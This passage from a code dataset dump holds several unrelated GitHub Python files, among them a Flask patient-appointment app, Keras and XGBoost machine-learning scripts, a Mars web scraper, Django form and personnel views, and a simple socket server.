Appointments.query.filter_by(p_id=current_user.p_id).all()\n appoints = sorting_appointments(appoints, 'patient')\n PRs.reverse()\n d_obj = any_name(PRs, 'doctor')\n if request.method == 'POST':\n pic_path = save_picture(request.files['myfile'], 'profile_pics')\n current_user.p_photo = pic_path\n db.session.commit()\n return redirect(url_for('p_profile'))\n return render_template('patient_profile.html', user=current_user, MR=MR, PRs=PRs, appoints=appoints,\n active=sidebar_active, d_obj=d_obj)\n else:\n render_template('page403.html')\n\n\n@app.route('/BookAppointment', methods=['GET', 'POST'])\n@login_required\ndef book_appointment():\n # Setting the logged in user type\n if session[\"role\"] == \"Patient\":\n global day\n # For the dynamic navbar\n sidebar_active = 'book_appointment'\n doctors = Doctors.query.all()\n if request.method == 'POST':\n session['doc_id'] = request.form['doctors']\n session['day'] = request.form['date']\n\n return redirect(url_for('doc_appointments'))\n\n return render_template('Booking.html', user=current_user, doctors=doctors, active=sidebar_active)\n else:\n render_template('page403.html')\n\n\n@app.route('/AvailableAppointment', methods=['GET', 'POST'])\n@login_required\ndef doc_appointments():\n # Setting the logged in user type\n if session[\"role\"] == \"Patient\":\n # For the dynamic navbar\n sidebar_active = 'book_appointment'\n doc = Doctors.query.filter_by(d_id=session['doc_id']).first()\n if request.method == 'POST':\n hour = request.form['Time']\n p_date, p_time = parse_time(session['day'], hour)\n appoint = Appointments(p_id=current_user.p_id,\n d_id=doc.d_id, date=p_date, Time=p_time)\n db.session.add(appoint)\n db.session.commit()\n google_calendar = generate_gcalendar_link(\n f\"Appointment with dr {Doctors.query.filter_by(d_id=session['doc_id']).first().d_name} at cardiology department\",\n \"\", parse_time2(session['day'], hour),\n parse_time2(session['day'], hour) + timedelta(minutes=30))\n flash(Markup(\n f'A new appointment is created, save the appointment to your calendar'),\n 'success')\n\n if examin.query.filter_by(d_id=doc.d_id, p_id=current_user.p_id).all() == []:\n pat = examin(d_id=doc.d_id, p_id=current_user.p_id)\n db.session.add(pat)\n db.session.commit()\n return redirect(url_for('book_appointment'))\n\n available_time = availabe_appointments(doc, session['day'])\n return render_template('book2.html', user=current_user, time=available_time, active=sidebar_active)\n else:\n render_template('page403.html')\n\n\n@app.route('/contact', methods=['POST', 'GET'])\n@login_required\ndef contact_page():\n # Setting the logged in user type\n if session[\"role\"] == \"Patient\":\n # For the dynamic navbar\n sidebar_active = 'contact_page'\n doctors = Doctors.query.all()\n if request.method == 'POST':\n _text = request.form['Message']\n session['doc_id'] = request.form['doctor']\n message1 = p_Messages(p_id=p_user.p_id, d_id=Doctors.query.filter_by(d_id=session['doc_id']).first().d_id,\n message=_text, msg_date=datetime.now())\n db.session.add(message1)\n db.session.commit()\n flash('Message is sent successfully')\n else:\n render_template('page403.html')\n\n return render_template('contact.html', user=p_user, doctors=doctors, active=sidebar_active)\n\n\n@app.route('/scans', methods=['POST', 'GET'])\n@login_required\ndef scans_page():\n # Setting the logged in user type\n if session[\"role\"] == \"Patient\":\n # For the dynamic navbar\n sidebar_active = 'scans_page'\n i = 1\n if request.method == 'POST':\n scan_path = save_picture(request.files['myfile'], 'scans')\n scan = Scans(p_id=p_user.p_id, scan_path=scan_path, scan_date=datetime.now())\n db.session.add(scan)\n db.session.commit()\n flash('Your scan is uploaded')\n\n patient_scans = Scans.query.filter_by(p_id=p_user.p_id).all()\n return render_template('scans.html', user=p_user, scans=patient_scans, i=i, active=sidebar_active)\n else:\n render_template('page403.html')\n\n\n@app.route('/EditPatientProfile', methods=['POST', 'GET'])\n@login_required\ndef edit_patient():\n # Setting the logged in user type\n if session[\"role\"] == \"Patient\":\n form = editPatientForm()\n if form.validate_on_submit():\n current_user.p_email = form.email.data\n current_user.password = form.password.data\n current_user.p_username = form.username.data\n current_user.p_phone = form.phone.data\n db.session.commit()\n flash(f'patient {current_user.p_name} account is updated', category='success')\n return redirect(url_for('p_profile'))\n if form.errors != {}: # If there are not errors from the validations\n for err_msg in form.errors.values():\n flash(f'There was an error with editing the admin: {err_msg}', category='danger')\n return render_template('edit_patient.html', user=current_user, form=form)\n else:\n render_template('page403.html')\n","repo_name":"mahmoud1yaser/Amicus","sub_path":"cardiology/patient.py","file_name":"patient.py","file_ext":"py","file_size_in_byte":6741,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"8806450188","text":"from numpy import array\r\nfrom keras.preprocessing.text import one_hot\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Flatten\r\nfrom keras.layers.embeddings import Embedding\r\n# define documents\r\ndocs = ['Well done!',\r\n\t\t'Good work',\r\n\t\t'Great effort',\r\n\t\t'nice work',\r\n\t\t'Excellent!',\r\n\t\t'Weak',\r\n\t\t'Poor effort!',\r\n\t\t'not good',\r\n\t\t'poor work',\r\n\t\t'Could have done better.']\r\n# define class labels\r\nlbls = array([1,1,1,1,1,0,0,0,0,0])\r\n# integer encode the documents\r\nvs = 50\r\nenc_docs = [one_hot(d, vs) for d in docs]\r\nprint(enc_docs)\r\n# pad documents to a max length of 4 words\r\nmax_length = 4\r\np_docs = pad_sequences(enc_docs, maxlen=max_length, padding='post')\r\nprint(p_docs)\r\n# define the model\r\nmodelEmb = Sequential()\r\nmodelEmb.add(Embedding(vs, 8, input_length=max_length))\r\nmodelEmb.add(Flatten())\r\nmodelEmb.add(Dense(1, activation='sigmoid'))\r\n# compile the model\r\nmodelEmb.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])\r\n# summarize the model\r\nprint(modelEmb.summary())\r\n# fit the model\r\nmodelEmb.fit(p_docs, lbls, epochs=150, verbose=0)\r\n# evaluate the model\r\nloss, accuracy = modelEmb.evaluate(p_docs, lbls, verbose=2)\r\nprint('Accuracy: %f' % (accuracy*100))","repo_name":"fgafarov/learn-neural-networks","sub_path":"word_embed.py","file_name":"word_embed.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"31178521204","text":"import numpy as np\nimport numpy.ma as ma\nimport pandas as pd\nimport os\nimport gc\nfrom tqdm import tqdm\n\nfrom utils.imagegen import *\nfrom utils.models import *\nfrom utils.loaderjpg import *\nfrom utils.generator import *\nfrom utils.augmentation import *\n\n# supports 3 channels JPG only. Use predictor.py for 4+ channels.\n\ndef make_submission(model, thresholds, rescale_dim, labels, sample_submission_filepath, real_submission_filepath, generator):\n\tdf_submission = pd.read_csv(sample_submission_filepath)\n\ttest_set = load_test_set(df_submission, rescale_dim)\n\tnumber_of_samples = df_submission.shape[0]\n\tprobability_prediction_filepath = real_submission_filepath + '.h5'\n\tpredict_df = prediction_dataframe(model, thresholds, labels, test_set, generator, probability_prediction_filepath);\n\tsubmit_df = submission_dataframe(df_submission, predict_df)\n\tsubmit_df.to_csv(real_submission_filepath, index=False)\n\tprint('submission file generated: {}'.format(real_submission_filepath))\n\ndef prediction_dataframe(model, thresholds, labels, test_set, generator, probability_prediction_filepath):\n\t# batch_size is limited by amount of RAM in computer and RAM in GPU. Set smaller batch size for bigger models like ResNet50 and VGG19.\n\tbatch_size = 16 #64\n\tprobability_prediction = predict_probabilities(test_set, model, batch_size, generator)\n\t# backup the probabilities for easy result ensembling\n\tnp.save(probability_prediction_filepath, probability_prediction)\n\ttest_prediction = predict_binary(probability_prediction, thresholds)\n\tresult_df = pd.DataFrame(test_prediction, columns = labels)\n\treturn result_df\n\ndef submission_dataframe(df_submission, result_dataframe):\n\t\"\"\"Turn a sample submission dataframe into a real prediction result submission dataframe\"\"\"\n\tpreds = []\n\tfor i in tqdm(range(result_dataframe.shape[0]), miniters=1000):\n\t\ta = result_dataframe.ix[[i]]\n\t\ta = a.transpose()\n\t\ta = a.loc[a[i] == 1]\n\t\t' '.join(list(a.index))\n\t\tpreds.append(' '.join(list(a.index)))\n\tdf_submission['tags'] = preds\n\treturn df_submission\n\ndef predict_binary(probability_predict, thresholds):\n\t\"\"\"Turn probabilites into 1's and 0's (binary) \"\"\"\n\ty_testset_predictions = (np.array(probability_predict) > thresholds).astype(int)\n\treturn y_testset_predictions\n\ndef predict_probabilities(test_set, model, batch_size, generator):\n\t\"\"\"\n\t\tTest Time Augmentation applied. +0.0008 in F2 score.\n\t\tbatch_size: Predict in small batches to fit within limited GPU memory\n\t\"\"\"\n\t#print(test_subset.shape)\n\ttestset_generator_1 = generator.testGen(test_set, batch_size)\n\ttestset_predict_1 = model.predict_generator(testset_generator_1, test_set.shape[0])\n\n\ttestset_generator_2 = generator.testGen(test_set, batch_size, tta_func=apply_tta_fliplr)\n\ttestset_predict_2 = model.predict_generator(testset_generator_2, test_set.shape[0])\n\n\ttestset_generator_3 = generator.testGen(test_set, batch_size, tta_func=apply_tta_flipud)\n\ttestset_predict_3 = model.predict_generator(testset_generator_3, test_set.shape[0])\n\n\ttestset_generator_4 = generator.testGen(test_set, batch_size, tta_func=apply_tta_flipboth)\n\ttestset_predict_4 = model.predict_generator(testset_generator_4, test_set.shape[0])\n\n\ttestset_predict = np.mean([testset_predict_1, testset_predict_2, testset_predict_3, testset_predict_4], axis=0)\n\n\treturn testset_predict","repo_name":"jackkwok/satellite-imagery-keras-deep-learning","sub_path":"utils/predictorjpg.py","file_name":"predictorjpg.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"31131179828","text":"# Declare Dependencies \nfrom bs4 import BeautifulSoup as bs\nfrom splinter import Browser\nimport pandas as pd\n\n\n# Choose the executable path to driver, for Windows specifically; from activity 12-01-05\nexecutable_path = {\"executable_path\": \"../../MyForkOfRepo/chromedriver.exe\"}\nbrowser = Browser(\"chrome\", **executable_path, headless=False)\n\n\n# NASA Mars News\n\n# Visit NASA news url through splinter module; activity 12-01-01, 02, 03, 05, 07\nurl = \"https://mars.nasa.gov/news/\"\nbrowser.visit(url)\n\n# HTML object\nhtml = browser.html\n\n# use bs to write to html\nsoup = bs(html, \"html.parser\")\n\n\n# inspect mars.nasa.gov to determine class text for title and paragraph;\n# retrieve latest element that contains news title and news paragraph; activity 12-01-04, 05\nnews_title = soup.find(\"div\", class_=\"content_title\").text\nnews_p = soup.find(\"div\", class_=\"article_teaser_body\").text\n\n# Display scrapped info \nprint(news_title)\nprint(news_p)\n\n\n# JPL Mars Space Images - Featured Image\n\n# Visit Mars Space Images through splinter module\nmars_image_url = \"https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars\"\nbrowser.visit(mars_image_url)\n\n# HTML Object \nhtml_image = browser.html\n\n# Parse HTML with Beautiful Soup\nsoup = bs(html_image, \"html.parser\")\n\n# Retrieve background image url from style tag \nfeatured_image_url = soup.find(\"article\")[\"style\"].replace(\"background-image: url(\",\"\").replace(\");\", \"\")[1:-1]\n\n# Website Url \nmain_url = \"https://www.jpl.nasa.gov\"\n\n# Concatenate website url with scrapped route\nfeatured_image_url = main_url + featured_image_url\n\n# Display full link to featured image\nfeatured_image_url\n\n\n# Mars Facts\n\n# Visit Mars facts url; using activity 12-01-07\nfacts_url = \"http://space-facts.com/mars/\"\n\n# Use Pandas to read/parse the url\nmars_facts = pd.read_html(facts_url)\n\n# take mars_facts DataFrame and assign to mars_df\nmars_df = mars_facts[0]\n\n# Assign columns\nmars_df.columns = [\"Title\",\"Info\"]\n\n# Set the index to the `Title` column\nmars_df.set_index(\"Title\", inplace=True)\n# mars_df\n\n# Save html code\nmars_df.to_html()\n\n\n# Mars Hemispheres\n\n# Visit hemispheres website through splinter module \nhemispheres_url = \"https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars\"\nbrowser.visit(hemispheres_url)\n\nhtml_hemispheres = browser.html\n\n# Parse HTML with Beautiful Soup\nsoup = bs(html_hemispheres, \"html.parser\")\n\n# Retreive all items that contain mars hemispheres information\nitems = soup.find_all(\"div\", class_=\"item\")\n\n# Create empty list for hemisphere urls \nhemisphere_image_urls = []\n\n# Store the main_ul \nhemispheres_main_url = \"https://astrogeology.usgs.gov\"\n\n# Loop through the items previously stored\nfor i in items: \n # Store title\n title = i.find(\"h3\").text\n \n # Store link that leads to full image website; use inspect web page for class\n partial_img_url = i.find(\"a\", class_=\"itemLink product-item\")[\"href\"]\n \n # Visit the link that contains the full image website \n browser.visit(hemispheres_main_url + partial_img_url)\n \n # HTML Object of individual hemisphere information \n partial_img_html = browser.html\n \n # Parse HTML with Beautiful Soup for each hemisphere \n soup = bs(partial_img_html, \"html.parser\")\n \n # Retrieve full image source; click thumbnail, inspect page for class\n img_url = hemispheres_main_url + soup.find(\"img\", class_=\"wide-image\")[\"src\"]\n \n # Append the retreived information into a list of dictionaries \n hemisphere_image_urls.append({\"title\" : title, \"img_url\" : img_url})\n \n\n# Display hemisphere_image_urls\nhemisphere_image_urls","repo_name":"kristyski/web-scraping-challenge","sub_path":"Missions_to_Mars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31963395955","text":"# -*- coding: utf-8 -*-\n\"\"\"Forms for Django-Dag Models\"\"\"\n\nfrom django import forms\nfrom django.db.models import Count\nfrom django.core.exceptions import ValidationError\nfrom django.forms.models import ErrorList\nfrom django.utils.html import escape\nfrom django.utils.safestring import mark_safe\nfrom django.utils.translation import ugettext_lazy as _\nfrom django_dag_admin.utils import get_nodedepth\n\n\nclass BaseDagMoveForm(forms.ModelForm):\n @staticmethod\n def mk_indent(level):\n return '    ' * (level - 1)\n\n @classmethod\n def add_subtree(cls, for_node, node, options):\n \"\"\"Recursively build options tree.\"\"\"\n try:\n if for_node:\n node._meta.model.circular_checker(node, for_node)\n except ValidationError:\n # Catch ValidationError ie The object is an ancestor or it's self\n pass\n else:\n options.append(\n (node.pk,\n mark_safe(cls.mk_indent(get_nodedepth(node)) + escape(node))))\n for subnode in node.children.all():\n cls.add_subtree(for_node, subnode, options)\n\n @classmethod\n def mk_dropdown_tree(cls, model, for_node=None, for_edge=None):\n \"\"\"Creates a tree-like list of choices\"\"\"\n options = [(0, _('-- root --'))]\n\n if for_node is None and for_edge:\n for_node = for_edge.child\n\n for node in model.objects.annotate(\n Count('parents')\n ).filter(parents__count=0):\n cls.add_subtree(for_node, node, options)\n return options\n\n\nclass MoveEdgeForm(BaseDagMoveForm):\n def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,\n initial=None, error_class=ErrorList, label_suffix=':',\n empty_permitted=False, instance=None,\n parent_object=None,\n **kwargs):\n\n opts = self._meta\n if opts.model is None:\n raise ValueError('ModelForm has no model class specified')\n\n choices = None\n if choices is not None:\n lct = dict(self.base_fields['parent'].limit_choices_to)\n lct.update({'pk__in': [cc[0] for cc in choices]})\n self.base_fields['parent'].limit_choices_to = lct\n\n super().__init__(\n data=data, files=files, auto_id=auto_id, prefix=prefix,\n initial=initial, error_class=error_class,\n label_suffix=label_suffix, empty_permitted=empty_permitted,\n instance=instance, **kwargs)\n\n def clean(self):\n cleaned_data = super().clean()\n parent = cleaned_data.get('parent')\n if parent is None:\n return cleaned_data\n try:\n child = cleaned_data['id'].child\n except AttributeError:\n return cleaned_data\n nodeModel = child._meta.model\n try:\n nodeModel._meta.model.circular_checker(parent, child)\n except ValidationError as err:\n self.add_error('parent', err)\n return cleaned_data\n\n\nclass MoveNodeForm(BaseDagMoveForm):\n pass\n","repo_name":"bva-icx/django-dag-admin","sub_path":"src/django_dag_admin/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25262194315","text":"from threading import Thread, Lock, Event\nimport socket\nimport time\n\nfrom lru import LRU\n\nclass SocketCommunicator():\n def __init__(self, maxUnacceptConnections=5):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = ('', 10000)\n self.sock.bind(server_address)\n self.sock.listen(maxUnacceptConnections)\n\n self.theData = []\n self.theDataLock = Lock()\n self.shutdown_event = Event()\n self.theThread = None\n\n self.connections = LRU(10)\n\n def startServer(self):\n if self.theThread is not None:\n return\n def start():\n while not self.shutdown_event.is_set():\n print('waiting for connection...')\n connection, client_address = self.sock.accept()\n print('accepted connection from: {}'.format(client_address))\n data = connection.recv(1)\n if data:\n data = data.decode()\n print(data)\n print()\n if self.connections.get(client_address) is None:\n self.connections[client_address] = data\n with self.theDataLock:\n self.theData.append(data)\n self.sock.close()\n servThread = Thread(target=start, daemon=True)\n servThread.start()\n self.theThread = servThread\n\n def sendMessage(self, addr, port, data):\n connection = socket.create_connection((addr, port))\n connection.sendall(data)\n connection.close()\n\n def stop(self):\n self.shutdown_event.set()\n if self.theThread is not None:\n self.theThread.join()\n\n def getTheData(self):\n with self.theDataLock:\n tmp = self.theData.copy()\n self.theData = []\n return tmp\n \n def whoSent(self, data):\n items = self.connections.items()\n for addr, msg in items:\n if msg==data:\n return addr\n return None\n\n \n\n","repo_name":"jaredwillard12/serverclient","sub_path":"serverclient/serverAndClient.py","file_name":"serverAndClient.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15385767926","text":"import pandas as pd\nfrom xgboost import XGBRegressor\nimport pickle\nimport numpy as np\n\nwith open('utils/feature_changes','rb') as f:\n feature_changes=pickle.load(f)\nwith open(\"utils/encoders.pkl\",'rb') as f:\n encoders=pickle.load(f)\nwith open(\"utils/total_columns.pkl\",'rb') as f:\n total_columns=pickle.load(f)\nwith open('utils/model_params.json','rb') as f:\n model_params=pickle.load(f)\nxgb1=XGBRegressor(**model_params)\nxgb1.load_model('utils/xgboost_0')\nxgb2=XGBRegressor(**model_params)\nxgb2.load_model('utils/xgboost_1')\nxgb3=XGBRegressor(**model_params)\nxgb3.load_model('utils/xgboost_2')\nxgb4=XGBRegressor(**model_params)\nxgb4.load_model('utils/xgboost_3')\nxgb5=XGBRegressor(**model_params)\nxgb5.load_model('utils/xgboost_4')\n\n\ndef fill_cloud(site):\n if str(feature_changes['fill_null/weather/cloud_coverage'][site])=='nan':\n return feature_changes['fill_null/weather/cloud_coverage_cloud_fill_nan']\n else:\n return feature_changes['fill_null/weather/cloud_coverage'][site]\ndef fill_precip(site):\n if str(feature_changes['fill_null/weather/precip_depth_1_hr'][site])=='nan':\n return feature_changes['fill_null/weather/precip_depth_1_hr_precip_fill_nan']\n else:\n return feature_changes['fill_null/weather/precip_depth_1_hr'][site]\n\ndef get_preprocessed(data):\n df=pd.DataFrame(data,index=[0])\n df['air_temperature'].fillna(value=feature_changes['fill_null/weather/air_temperature'],inplace=True)\n df['sea_level_pressure'].fillna(value=feature_changes['fill_null/weather/sea_level_pressure'],inplace=True)\n df['wind_speed'].fillna(value=feature_changes['fill_null/weather/wind_speed'],inplace=True)\n df['dew_temperature'].fillna(value=feature_changes['fill_null/weather/dew_temperature'],inplace=True)\n df['wind_direction'].fillna(value=feature_changes['fill_null/weather/wind_direction'],inplace=True)\n df.loc[df['floor_count'].isnull()==True,'floor_count']=df.loc[df['floor_count'].isnull()==True,'primary_use'].map(feature_changes['fill_null/build/floor_count'])\n df.loc[df['cloud_coverage'].isnull()==True,'cloud_coverage']=df.loc[df['cloud_coverage'].isnull()==True,'site_id'].apply(fill_cloud)\n df.loc[df['precip_depth_1_hr'].isnull()==True,'precip_depth_1_hr']=df.loc[df['precip_depth_1_hr'].isnull()==True,'site_id'].apply(fill_precip)\n for col,encoder in encoders.items():\n df[col]=encoder.transform(df[col])\n return df\n\ndef get_model_prediction(data):\n data=data[total_columns].values\n p1=np.expm1(xgb1.predict(data))\n p2=np.expm1(xgb2.predict(data))\n p3=np.expm1(xgb3.predict(data))\n p4=np.expm1(xgb4.predict(data))\n p5=np.expm1(xgb5.predict(data))\n p=(p1+p2+p3+p4+p5)/5.0\n return float(p)\n ","repo_name":"RavitejaBadugu/ashare","sub_path":"deployment/fastapi/predictive_functions.py","file_name":"predictive_functions.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34074938291","text":"import sqlite3\n\ncon = sqlite3.connect(\"library.db\")\ncur = con.cursor()\n\ntry:\n cur.execute(\"CREATE TABLE Book(title, author, year)\")\n print(\"Tabella Book creata con successo.\")\nexcept:\n print(\"Non creo la tabella perché esite già.\")\n\ncur.execute(\"\"\"INSERT INTO Book VALUES\n ('Il Signore degli Anelli', 'Tolkien', 1954),\n ('2000 Leghe Sotto i Mari', 'Verne', 1850)\n\"\"\")\ncon.commit()\nprint(\"Query INSERT eseguita correttamente.\")\n\n\nres = cur.execute(\"\"\"SELECT * FROM Book\"\"\")\n\nbooks = res.fetchall()\n\nfor book in books:\n print(book)\n # print(book[0])\n # print(book[1])\n # print(book[2])\n","repo_name":"ecamellini/python-exercises","sub_path":"database-sqlite/example-db.py","file_name":"example-db.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"39099309598","text":"from sklearn.preprocessing import MinMaxScaler\nimport pandas as pd\n\ndf=pd.read_excel(r\"Datasets\\Excel.xlsx\")\nprint(df)\n\nscalar=MinMaxScaler()\n\ndf[[\"Salary\", \"Age\"]]=scalar.fit_transform(df[[\"Salary\", \"Age\"]])\nprint(df)\n","repo_name":"vicwei8128/Python_practise","sub_path":"Python_Demo/DataPreProcessing/DataPreProcessing/ScaleDataFrame.py","file_name":"ScaleDataFrame.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41323393457","text":"from django.shortcuts import render\nfrom django.shortcuts import HttpResponse\nfrom django.shortcuts import redirect\nfrom django.db.models import Q\nfrom .models import personnel as T_Personnel\nfrom .models import personcertif as T_PersonnelCertificate\nfrom group.models import group\nfrom team.models import team\nfrom basedata.models import base\nfrom devinterfacesrv.models import interfacesrvdata\nfrom appkey.models import appkey\nfrom common.views import *\nfrom django.http import JsonResponse\nfrom .forms import *\nfrom group.forms import GroupModelForm\nfrom organize.models import organize\nimport json\nfrom django.utils import timezone\nfrom django.forms import widgets as Fwidge\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# Create your views here.\n#班组管理控制器入口\ndef personnel(request):\n prj_id = request.session['PrjID']\n\n team_info = team.objects.filter(Q(FStatus=True), Q(CREATED_PRJ=prj_id))\n teaminfo = get_dict_table(team_info, 'FID', 'FName')\n\n worktype_info = base.objects.filter(Q(FPID='2137f046a6a711e9b7367831c1d24216'))\n worktypeinfo = get_dict_table(worktype_info, 'FID', 'FBase')\n\n group_info = group.objects.filter(Q(FStatus=True), Q(CREATED_PRJ=prj_id))\n groupinfo = get_dict_table(group_info, 'FID', 'FGroup')\n\n return render(request, 'content/personnel/personnelinfo.html', locals())\n\n\n#返回table数据及查询结果\ndef get_datasource(request):\n serinput = request.POST.get(\"resultdict[FName]\", '')\n\n prj_id = request.session['PrjID']\n\n Person_info = T_Personnel.objects.filter(Q(FName__contains=serinput), Q(CREATED_PRJ=prj_id))\n #Person_info = org_split(Person_info, request)\n\n dict = convert_to_dicts(Person_info)\n resultdict = {'code':0, 'msg':\"\", 'count': Person_info.count(), 'data': dict}\n\n return JsonResponse(resultdict, safe=False)\n\n\n#刷新下拉列表框数据\ndef ref_dropdowndata(obj, request):\n team_info = team.objects.filter(Q(FStatus=True), Q(CREATED_PRJ=request.session['PrjID']))\n worktype_info = base.objects.filter(Q(FPID='2137f046a6a711e9b7367831c1d24216'))\n\n obj.fields['FTeamID'].choices = get_dict_object(request, team_info, 'FID', 'FName')\n obj.fields['FWorktypeID'].choices = get_dict_object(request, worktype_info, 'FID', 'FBase')\n\n#链接增加模板\ndef add(request):\n if request.method == 'GET':\n fgroupid = ''.join(str(request.GET.get('fid')).split('-'))\n\n obj = PersonModelForm()\n\n group_info = group.objects.get(Q(FID=fgroupid))\n GroupForm = GroupModelForm(instance=group_info)\n\n team_info = team.objects.filter(Q(FStatus=True), Q(CREATED_PRJ=request.session['PrjID']))\n GroupForm.fields['FTeamID'].choices = get_dict_object(request, team_info, 'FID', 'FName')\n\n worktype_info = base.objects.filter(Q(FPID='2137f046a6a711e9b7367831c1d24216'))\n GroupForm.fields['FWorktypeID'].choices = get_dict_object(request, worktype_info, 'FID', 'FBase')\n\n certif_info = base.objects.filter(Q(FPID='691fd5e2a90711e9866b7831c1d24216'))\n certifinfo = get_dict_table(certif_info, 'FID', 'FBase')\n\n ref_dropdowndata(obj, request)\n return render(request, \"content/personnel/personneladd.html\" , {'obj': obj, 'GroupForm': GroupForm, 'fgroupid': fgroupid, 'certifinfo':certifinfo, 'action': 'insert'})\n\n\n#链接编辑模板\ndef edit(request):\n fid = request.GET.get('fid')\n\n Person_info = T_Personnel.objects.get(Q(FID=fid))\n fgroupid = Person_info.FGroupID\n obj = PersonModelForm(instance=Person_info)\n\n try:\n group_info = group.objects.get(Q(FID=fgroupid))\n GroupForm = GroupModelForm(instance=group_info)\n\n\n team_info = team.objects.filter(Q(FStatus=True), Q(CREATED_PRJ=request.session['PrjID']))\n GroupForm.fields['FTeamID'].choices = get_dict_object(request, team_info, 'FID', 'FName')\n\n worktype_info = base.objects.filter(Q(FPID='2137f046a6a711e9b7367831c1d24216'))\n GroupForm.fields['FWorktypeID'].choices = get_dict_object(request, worktype_info, 'FID', 'FBase')\n\n certif_info = base.objects.filter(Q(FPID='691fd5e2a90711e9866b7831c1d24216'))\n certifinfo = get_dict_table(certif_info, 'FID', 'FBase')\n\n photo_path = Person_info.FPhoto\n\n ref_dropdowndata(obj, request)\n\n return render(request, \"content/personnel/personneladd.html\", {'obj': obj, 'fgroupid': fgroupid, 'GroupForm': GroupForm, 'certifinfo': certifinfo, 'photopath': photo_path, 'action': 'update'})\n\n except ObjectDoesNotExist:\n return render(request, \"content/personnel/personneladd.html\", {'obj': obj, 'fgroupid': fgroupid, 'action': 'update'})\n\n\n#处理新增及保存\ndef insert(request):\n if request.method == 'POST':\n response_data = {}\n\n fgroupid = request.GET.get('fgroupid')\n\n if request.GET.get('actype') == 'insert':\n obj = PersonModelForm(request.POST)\n elif request.GET.get('actype') == 'update':\n fid = request.POST.get('FID')\n Person_info = T_Personnel.objects.get(FID=fid)\n obj = PersonModelForm(request.POST, instance=Person_info)\n else:\n response_data['result'] = '2'\n return HttpResponse(json.dumps(response_data))\n\n #ref_dropdowndata(obj, request)\n\n try:\n if obj.is_valid():\n temp = obj.save(commit=False)\n if request.GET.get('actype') == 'insert':\n temp.FStatus = 0\n temp.FGroupID = fgroupid\n temp.FTeamID = request.POST.get('FTeamID')\n temp.FWorktypeID = request.POST.get('FWorktypeID')\n temp.CREATED_PRJ = request.session['PrjID']\n temp.CREATED_ORG = request.session['UserOrg']\n temp.CREATED_BY = request.session['UserID']\n temp.UPDATED_BY = request.session['UserID']\n temp.CREATED_TIME = timezone.now()\n\n temp.save()\n response_data['result'] = '0'\n else:\n response_data['msg'] = obj.errors\n response_data['result'] = '1'\n\n return HttpResponse(json.dumps(response_data))\n\n except Exception as e:\n response_data['msg'] = e\n response_data['result'] = '1'\n\n return HttpResponse(json.dumps(response_data))\n\n#处理禁用/启用班组\ndef disabled(request):\n response_data = {}\n if request.method == 'POST':\n fid = request.POST.get('fid')\n\n try:\n Person_info = T_Personnel.objects.get(FID=fid)\n\n if request.GET.get('type') == 'lock':\n Person_info.FStatus = 2\n elif request.GET.get('type') == 'unlock':\n Person_info.FStatus = 0\n\n Person_info.save()\n\n response_data['result'] = '0'\n return HttpResponse(json.dumps(response_data))\n except ObjectDoesNotExist:\n response_data['result'] = '2'\n return HttpResponse(json.dumps(response_data))\n\n else:\n response_data['result'] = '2'\n return HttpResponse(json.dumps(response_data))\n\n\n#处理退场/返场\ndef sign(request):\n response_data = {}\n if request.method == 'POST':\n fid = request.POST.get('fid')\n\n try:\n Person_info = T_Personnel.objects.get(FID=fid)\n\n if request.GET.get('type') == 'out':\n Person_info.FStatus = 1\n Person_info.FQuitDate = timezone.now()\n elif request.GET.get('type') == 'in':\n Person_info.FStatus = 0\n Person_info.FQuitDate = None\n\n Person_info.save()\n\n response_data['result'] = '0'\n return HttpResponse(json.dumps(response_data))\n except ObjectDoesNotExist:\n response_data['result'] = '2'\n return HttpResponse(json.dumps(response_data))\n\n else:\n response_data['result'] = '2'\n return HttpResponse(json.dumps(response_data))\n\n\n\n#刷新下拉列表框数据\ndef ref_certidropdowndata(obj, request):\n certiftype_info = base.objects.filter(Q(FPID='691fd5e2a90711e9866b7831c1d24216'))\n obj.fields['FCertitypeID'].choices = get_dict_object(request, certiftype_info, 'FID', 'FBase')\n\n\n#链接上传图片窗口\ndef show_upload(request):\n obj = PersonnelCertificateModeForm()\n fid = ''.join(str(request.GET.get('fid')).split('-'))\n\n ref_certidropdowndata(obj, request)\n\n if request.method == 'POST':\n obj = PersonnelCertificateModeForm(request.POST, request.FILES)\n ref_certidropdowndata(obj, request)\n\n if obj.is_valid():\n temp = obj.save(commit=False)\n temp.FPID = request.POST.get('FPID')\n temp.CREATED_PRJ = request.session['PrjID']\n temp.CREATED_ORG = request.session['UserOrg']\n temp.CREATED_BY = request.session['UserID']\n temp.UPDATED_BY = request.session['UserID']\n temp.CREATED_TIME = timezone.now()\n\n temp.save()\n\n url = '/personnel/show_upload?fid='+request.POST.get('FPID')\n return redirect(url)\n\n else:\n return render(request, \"content/personnel/certificateupload.html\", {'obj': obj, 'fid': fid})\n\n#图片明细数据源\ndef 